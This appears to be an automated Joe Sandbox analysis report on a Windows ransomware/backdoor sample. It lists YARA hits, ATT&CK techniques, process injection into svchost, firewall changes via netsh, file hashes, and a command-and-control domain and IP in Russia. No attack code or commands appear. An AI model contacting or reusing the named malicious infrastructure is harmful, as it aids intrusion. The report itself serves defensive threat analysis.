Source: Yara match | File source: 0.3.OcmKX57vR7.exe.af0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.svchost.exe.2510000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.svchost.exe.2510000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.OcmKX57vR7.exe.ad0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.pjzcupje.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.3.pjzcupje.exe.b50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.pjzcupje.exe.b50000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.pjzcupje.exe.b50000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.pjzcupje.exe.b30e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.pjzcupje.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000D.00000002.284998485.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.265491962.0000000000AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.285025584.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000003.283655690.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: OcmKX57vR7.exe PID: 6360, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: pjzcupje.exe PID: 6792, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 6936, type: MEMORYSTR
Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Code function: 0_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,0_2_004088B0
Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe | Code function: 13_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,13_2_004088B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_025188B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,17_2_025188B0
MITRE ATT&CK Matrix (techniques grouped by tactic column; a number in parentheses is the report's match count for a technique observed in this analysis, techniques without a number were not observed):

Initial Access
• Valid Accounts (1)
• Default Accounts
• Domain Accounts
• Local Accounts
• Cloud Accounts
• Replication Through Removable Media
• External Remote Services
• Drive-by Compromise
• Exploit Public-Facing Application
• Supply Chain Compromise
• Compromise Software Dependencies and Development Tools

Execution
• Windows Management Instrumentation (1)
• Native API (41)
• Command and Scripting Interpreter (2)
• Service Execution (3)
• Cron
• Launchd
• Scheduled Task
• Command and Scripting Interpreter
• PowerShell
• AppleScript
• Windows Command Shell

Persistence
• DLL Side-Loading (1)
• Valid Accounts (1)
• Windows Service (14)
• Logon Script (Mac)
• Network Logon Script
• Rc.common
• Startup Items
• Scheduled Task/Job
• At (Linux)
• At (Windows)
• Cron

Privilege Escalation
• DLL Side-Loading (1)
• Valid Accounts (1)
• Access Token Manipulation (1)
• Windows Service (14)
• Process Injection (412)
• Rc.common
• Startup Items
• Scheduled Task/Job
• At (Linux)
• At (Windows)
• Cron

Defense Evasion
• Disable or Modify Tools (3)
• Deobfuscate/Decode Files or Information (1)
• Obfuscated Files or Information (2)
• Software Packing (21)
• DLL Side-Loading (1)
• File Deletion (1)
• Masquerading (12)
• Valid Accounts (1)
• Virtualization/Sandbox Evasion (22)
• Access Token Manipulation (1)
• Process Injection (412)

Credential Access
• OS Credential Dumping
• LSASS Memory
• Security Account Manager
• NTDS
• LSA Secrets
• Cached Domain Credentials
• DCSync
• Proc Filesystem
• /etc/passwd and /etc/shadow
• Network Sniffing
• Input Capture

Discovery
• System Time Discovery (2)
• Account Discovery (1)
• File and Directory Discovery (1)
• System Information Discovery (25)
• Security Software Discovery (241)
• Virtualization/Sandbox Evasion (22)
• System Owner/User Discovery (1)
• Remote System Discovery (1)
• System Network Configuration Discovery (1)
• Process Discovery
• Permission Groups Discovery

Lateral Movement
• Remote Services
• Remote Desktop Protocol
• SMB/Windows Admin Shares
• Distributed Component Object Model
• SSH
• VNC
• Windows Remote Management
• Shared Webroot
• Software Deployment Tools
• Taint Shared Content
• Replication Through Removable Media

Collection
• Archive Collected Data (1)
• Data from Removable Media
• Data from Network Shared Drive
• Input Capture
• Keylogging
• GUI Input Capture
• Web Portal Capture
• Credential API Hooking
• Data Staged
• Local Data Staging
• Remote Data Staging

Exfiltration
• Exfiltration Over Other Network Medium
• Exfiltration Over Bluetooth
• Automated Exfiltration
• Scheduled Transfer
• Data Transfer Size Limits
• Exfiltration Over C2 Channel
• Exfiltration Over Alternative Protocol
• Exfiltration Over Symmetric Encrypted Non-C2 Protocol
• Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
• Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
• Exfiltration Over Physical Medium

Command and Control
• Ingress Tool Transfer (1)
• Encrypted Channel (12)
• Non-Application Layer Protocol (1)
• Application Layer Protocol (112)
• Fallback Channels
• Multiband Communication
• Commonly Used Port
• Application Layer Protocol
• Web Protocols
• File Transfer Protocols
• Mail Protocols

Network Effects
• Eavesdrop on Insecure Network Communication
• Exploit SS7 to Redirect Phone Calls/SMS
• Exploit SS7 to Track Device Location
• SIM Card Swap
• Manipulate Device Communication
• Jamming or Denial of Service
• Rogue Wi-Fi Access Points
• Downgrade to Insecure Protocols
• Rogue Cellular Base Station

Remote Service Effects
• Remotely Track Device Without Authorization
• Remotely Wipe Data Without Authorization
• Obtain Device Cloud Backups
• Carrier Billing Fraud
• Manipulate App Store Rankings or Ratings
• Abuse Accessibility Features

Impact
• Modify System Partition
• Device Lockout
• Delete Device Data
• Data Encrypted for Impact
• Generate Fraudulent Advertising Revenue
• Data Destruction
• Data Encrypted for Impact
• Service Stop
[Behavior graph, ID 658475, sample OcmKX57vR7, start date 07/07/2022, architecture WINDOWS, score 100. Processes: OcmKX57vR7.exe (drops pjzcupje.exe, uses netsh to modify the Windows network and firewall settings, starts cmd.exe and netsh.exe), pjzcupje.exe (detected unpacking, writes to foreign memory regions, starts svchost.exe), svchost.exe (changes security center settings, starts MpCmdRun.exe), several conhost.exe instances and 11 other processes. Network: the injected svchost.exe contacts svartalfheim.top (46.173.215.82, port 443, GARANT-PARK-INTERNETRU, Russian Federation) and microsoft-com.mail.protection.outlook.com (40.93.207.0, port 25, MICROSOFT-CORP-MSN-AS-BLOCKUS, United States); local addresses 127.0.0.1 and 192.168.2.1 are also seen. Signatures on that svchost.exe: System process connects to network (likely due to code injection or exploit), Found API chain indicative of debugger detection, Deletes itself after installation.]

Initial Sample
Source | Detection | Scanner | Label
OcmKX57vR7.exe | 49% | Virustotal |
OcmKX57vR7.exe | 46% | Metadefender |
OcmKX57vR7.exe | 85% | ReversingLabs | Win32.Ransomware.StopCrypt
OcmKX57vR7.exe | 100% | Joe Sandbox ML |

Dropped Files
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\pjzcupje.exe | 100% | Avira | HEUR/AGEN.1242277
C:\Users\user\AppData\Local\Temp\pjzcupje.exe | 100% | Joe Sandbox ML |

Unpacked PE Files
Source | Detection | Scanner | Label
17.2.svchost.exe.2510000.0.unpack | 100% | Avira | BDS/Backdoor.Gen
0.2.OcmKX57vR7.exe.400000.0.unpack | 100% | Avira | BDS/Backdoor.Gen
0.3.OcmKX57vR7.exe.af0000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
13.3.pjzcupje.exe.b50000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
13.2.pjzcupje.exe.b50000.2.unpack | 100% | Avira | BDS/Backdoor.Gen
0.2.OcmKX57vR7.exe.ad0e67.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
13.2.pjzcupje.exe.400000.0.unpack | 100% | Avira | BDS/Backdoor.Gen
13.2.pjzcupje.exe.b30e67.1.unpack | 100% | Avira | TR/Patched.Ren.Gen

Domains
Source | Detection | Scanner | Label
svartalfheim.top | 11% | Virustotal |

URLs
Source | Detection | Scanner | Label
https://www.pango.co/privacy | 0% | URL Reputation | safe
https://www.tiktok.com/legal/report | 0% | URL Reputation | safe
svartalfheim.top:443 | 100% | Avira URL Cloud | malware
https://www.disneyplus.com/legal/your-california-privacy-rights | 0% | URL Reputation | safe
http://crl.ver) | 0% | Avira URL Cloud | safe
https://www.tiktok.com/legal/report/feedback | 0% | URL Reputation | safe
https://%s.xboxlive.com | 0% | URL Reputation | safe
https://www.disneyplus.com/legal/privacy-policy | 0% | URL Reputation | safe
jo:443 | 0% | Avira URL Cloud | safe
https://dynamic.t | 0% | URL Reputation | safe
https://disneyplus.com/legal. | 0% | URL Reputation | safe
http://help.disneyplus.com. | 0% | URL Reputation | safe
https://%s.dnet.xboxlive.com | 0% | URL Reputation | safe
Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
svartalfheim.top | 46.173.215.82 | true | true | | unknown
microsoft-com.mail.protection.outlook.com | 40.93.207.0 | true | false | | high

Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
svartalfheim.top:443 | true | Avira URL Cloud: malware | unknown
jo:443 | true | Avira URL Cloud: safe | low
URLs from Memory and Binaries
Name | Source | Malicious | Antivirus Detection | Reputation
https://t0.tiles.ditu.live.com/tiles/gen | svchost.exe, 00000015.00000002.318292795.000001E9FBE13000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.ditu.live.com/REST/v1/Routes/ | svchost.exe, 00000015.00000002.318316299.000001E9FBE3D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Routes/Driving | svchost.exe, 00000015.00000003.317771744.000001E9FBE61000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx | svchost.exe, 00000015.00000002.318316299.000001E9FBE3D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.ditu.live.com/REST/v1/Traffic/Incidents/ | svchost.exe, 00000015.00000002.318325260.000001E9FBE4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317838375.000001E9FBE49000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Routes/Walking | svchost.exe, 00000015.00000003.317771744.000001E9FBE61000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n= | svchost.exe, 00000015.00000003.317873826.000001E9FBE40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.318321603.000001E9FBE42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317909344.000001E9FBE41000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.ditu.live.com/mapcontrol/logging.ashx | svchost.exe, 00000015.00000003.317771744.000001E9FBE61000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/ | svchost.exe, 00000015.00000003.317838375.000001E9FBE49000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r= | svchost.exe, 00000015.00000003.296122146.000001E9FBE30000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Transit/Schedules/ | svchost.exe, 00000015.00000003.317873826.000001E9FBE40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.318321603.000001E9FBE42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317909344.000001E9FBE41000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.hotspotshield.com/terms/ | svchost.exe, 0000001E.00000003.411961992.000001D6C5E19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411769784.000001D6C5E03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411708385.000001D6C59A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411692699.000001D6C5993000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411904227.000001D6C59B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411724964.000001D6C59B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411746076.000001D6C5E02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411602296.000001D6C5996000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.pango.co/privacy | svchost.exe, 0000001E.00000003.411961992.000001D6C5E19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411769784.000001D6C5E03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411708385.000001D6C59A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411692699.000001D6C5993000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411904227.000001D6C59B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411724964.000001D6C59B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411746076.000001D6C5E02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411602296.000001D6C5996000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.tiktok.com/legal/report | svchost.exe, 0000001E.00000003.419224721.000001D6C5993000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.bingmapsportal.com | svchost.exe, 00000015.00000002.318292795.000001E9FBE13000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/ | svchost.exe, 00000015.00000002.318316299.000001E9FBE3D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx | svchost.exe, 00000015.00000003.317771744.000001E9FBE61000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.disneyplus.com/legal/your-california-privacy-rights | svchost.exe, 0000001E.00000003.415051605.000001D6C5993000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r= | svchost.exe, 00000015.00000003.317873826.000001E9FBE40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317905164.000001E9FBE45000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.ditu.live.com/REST/v1/Transit/Stops/ | svchost.exe, 00000015.00000003.317741272.000001E9FBE68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.318344962.000001E9FBE6A000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Routes/ | svchost.exe, 00000015.00000002.318316299.000001E9FBE3D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Traffic/Incidents/ | svchost.exe, 00000015.00000003.296122146.000001E9FBE30000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r= | svchost.exe, 00000015.00000003.296122146.000001E9FBE30000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://crl.ver) | svchost.exe, 0000001A.00000002.528990396.0000023757A8B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.438828550.000001D6C50EC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.401236022.000001D6C50EC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.528434490.00000290CC8DA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log? | svchost.exe, 00000015.00000002.318325260.000001E9FBE4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317838375.000001E9FBE49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317873826.000001E9FBE40000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.tiktok.com/legal/report/feedback | svchost.exe, 0000001E.00000003.419259422.000001D6C5E02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.419125131.000001D6C59BA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.419241431.000001D6C59A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.419224721.000001D6C5993000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.419194698.000001D6C59BA000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r= | svchost.exe, 00000015.00000002.318316299.000001E9FBE3D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.318292795.000001E9FBE13000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://%s.xboxlive.com | svchost.exe, 00000013.00000002.528165639.000001D77D242000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | low
https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v= | svchost.exe, 00000015.00000003.317808860.000001E9FBE4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.318051847.000001E9FBE50000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Locations | svchost.exe, 00000015.00000003.317771744.000001E9FBE61000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/09/enumer | svchost.exe, 0000001A.00000002.528559919.00000237524A2000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v= | svchost.exe, 00000015.00000003.296122146.000001E9FBE30000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/mapcontrol/logging.ashx | svchost.exe, 00000015.00000003.317771744.000001E9FBE61000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://support.hotspotshield.com/ | svchost.exe, 0000001E.00000003.411961992.000001D6C5E19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411769784.000001D6C5E03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411708385.000001D6C59A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411692699.000001D6C5993000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411904227.000001D6C59B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411724964.000001D6C59B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411746076.000001D6C5E02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411602296.000001D6C5996000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r= | svchost.exe, 00000015.00000002.318325260.000001E9FBE4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317838375.000001E9FBE49000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.disneyplus.com/legal/privacy-policy | svchost.exe, 0000001E.00000003.415051605.000001D6C5993000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/ | svchost.exe, 00000015.00000002.318325260.000001E9FBE4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317838375.000001E9FBE49000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dynamic.t | svchost.exe, 00000015.00000003.317905164.000001E9FBE45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317909344.000001E9FBE41000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit | svchost.exe, 00000015.00000003.317771744.000001E9FBE61000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://disneyplus.com/legal. | svchost.exe, 0000001E.00000003.415051605.000001D6C5993000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen | svchost.exe, 00000015.00000003.317932502.000001E9FBE39000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.296122146.000001E9FBE30000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r= | svchost.exe, 00000015.00000002.318325260.000001E9FBE4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317838375.000001E9FBE49000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://activity.windows.com | svchost.exe, 00000013.00000002.528165639.000001D77D242000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.ditu.live.com/REST/v1/Locations | svchost.exe, 00000015.00000003.317771744.000001E9FBE61000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://help.disneyplus.com. | svchost.exe, 0000001E.00000003.415051605.000001D6C5993000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://%s.dnet.xboxlive.com | svchost.exe, 00000013.00000002.528165639.000001D77D242000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | low
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/ | svchost.exe, 00000015.00000002.318325260.000001E9FBE4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317838375.000001E9FBE49000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r= | svchost.exe, 00000015.00000003.317838375.000001E9FBE49000.00000004.00000020.00020000.00000000.sdmp | false | | high
Contacted Public IPs
IP | Domain | Country | ASN | ASN Name | Malicious
40.93.207.0 | microsoft-com.mail.protection.outlook.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
46.173.215.82 | svartalfheim.top | Russian Federation | 47196 | GARANT-PARK-INTERNETRU | true

Private IPs
192.168.2.1
127.0.0.1
Joe Sandbox Version: 35.0.0 Citrine
Analysis ID: 658475
Start date and time: 2022-07-07 01:00:09 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 55s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: OcmKX57vR7 (renamed file extension from none to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 41
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@37/6@5/4
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 37.9% (good quality ratio 36.1%)
• Quality average: 87%
• Quality standard deviation: 25.3%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 62
• Number of non-executed functions: 265
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 20.82.210.154, 20.112.52.29, 20.81.111.85, 20.84.181.62, 20.103.85.33, 20.53.203.50, 23.211.4.86, 20.31.108.18, 20.238.103.94, 20.223.24.244, 52.140.118.28, 52.137.106.217
• Excluded domains from analysis (whitelisted): asf-ris-prod-neu-azsc.northeurope.cloudapp.azure.com, iris-de-prod-azsc-weu-b.westeurope.cloudapp.azure.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, settings-prod-wus2-1.westus2.cloudapp.azure.com, login.live.com, sls.update.microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, settings-win.data.microsoft.com, settings-prod-cin-1.centralindia.cloudapp.azure.com, atm-settingsfe-prod-weighted.trafficmanager.net, ris.api.iris.
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
01:01:49 | API Interceptor | 13x Sleep call for process: svchost.exe modified
01:02:37 | API Interceptor | 1x Sleep call for process: MpCmdRun.exe modified

Process:C:\Windows\System32\svchost.exe
File Type:Extensible storage engine DataBase, version 0x620, checksum 0x8ad9c3c7, page size 16384, DirtyShutdown, Windows version 10.0
Category:dropped
Size (bytes):786432
Entropy (8bit):0.2507251430431233
Encrypted:false
SSDEEP:384:U+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:rSB2nSB2RSjlK/+mLesOj1J2
MD5:92F591359703F36B9A9FF397F8F3E230
SHA1:FDB44524BAC59FE012C7E6B4D4E4FB7D5A11E772
SHA-256:E9F4AB65024ADAD5680AC8F14EE4782A746C3B440DFD2B2DEF932A339FC7234E
SHA-512:4296A673851E02D77ECAF672F4CC6ACCD72A49225161954497FFC77F89D925BC9F6FF56B142E404E06DA9F78CF7B6838482F55127FBE1C2C854B648E4C0DD764
Malicious:false

Process:C:\Users\user\Desktop\OcmKX57vR7.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):13894656
Entropy (8bit):6.269320784920095
Encrypted:false
SSDEEP:24576:R9X0YMmCUMy4444444444444444444444444444444444444444444444444444U:NCU
MD5:CD1553A922DBF34673BA9D9D9A0FF5DE
SHA1:E6D68A115FC8CDA2A6C10BAD3939D2A6467465C1
SHA-256:98D4810DA53B52396776B987C7C3EBB467C4C446DA27038E3B187E951982CDA3
SHA-512:34364B41B3EAC573683EE118F1493E27E59A71FEE242B12A53F1379AC7B9EA158AF05087DF30FEC37F9C6C0BB02B036D32BD0F58FE3EFF1EE11751E091CC7F05
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%

Process:C:\Windows\System32\svchost.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):55
Entropy (8bit):4.306461250274409
Encrypted:false
SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:DCA83F08D448911A14C22EBCACC5AD57
SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:false
Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Process:C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:modified
Size (bytes):9062
Entropy (8bit):3.162470837394252
Encrypted:false
SSDEEP:192:cY+38+DJl+ibJ6+ioJJ+i3N+WtT+E9tD+Ett3d+E3zC3+5t:j+s+v+b+P+m+0+Q+q+/3+5t
MD5:469A10BB5545A45460814FDE0DA96E47
SHA1:1129906D4FC36DB93D953D3B026E9FF60BE94154
SHA-256:9F97A971F92BA9082BE0F05CFD1EA6ADCE1AB0955BB0E4E61DBA02F8A2AD9208
SHA-512:C4784F3FAFE247BE69A259F30A6516DE383ACAA153323989B95289FEF47A510D214E61DD504108B155B186531928869029DF0F051C1E679230D8CBE796673AF3
Malicious:false
Preview:
-------------------------------------------------------------------------------------
MpCmdRun: Command Line: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
 Start Time: Thu Jun 27 2019 01:29:49
MpEnsureProcessMitigationPolicy: hr = 0x1
WDEnable
ERROR: MpWDEnable(TRUE) failed (800704EC)
MpCmdRun: End Time: Thu Jun 27 2019 01:29:49
-------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------

